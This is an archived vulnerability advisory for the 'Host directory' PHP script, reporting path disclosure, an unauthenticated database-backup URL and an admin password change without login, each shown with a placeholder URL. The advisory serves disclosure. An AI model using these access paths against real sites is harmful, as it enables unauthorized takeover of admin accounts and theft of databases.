TUCoPS :: HP Unsorted H :: c07-1498.htm

Host directory full disclosure and input error
Host directory full disclosure and input error
Host directory full disclosure and input error



Host directory is a product of scriptsfrenzy.com and alstrasoft.com
I check lastest version and maybe infected lower versions. I contacted 
vendor 5 times in 2 months but not received any replies.
- FullPath disclosure: http://site.ext/path/ANY_INCORRECT_LINK 
Warning: main(/home/user/public_html/include/ANY_INCORRECT_LINK.php): 
failed to open stream: No such file or directory in 
/home/user/public_html/include/main.php on line 25
- Backup database bypass: http://site.ext/path/admin/backup/db 
- Change admin password without login: 
http://site.ext/path/admin/config 


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH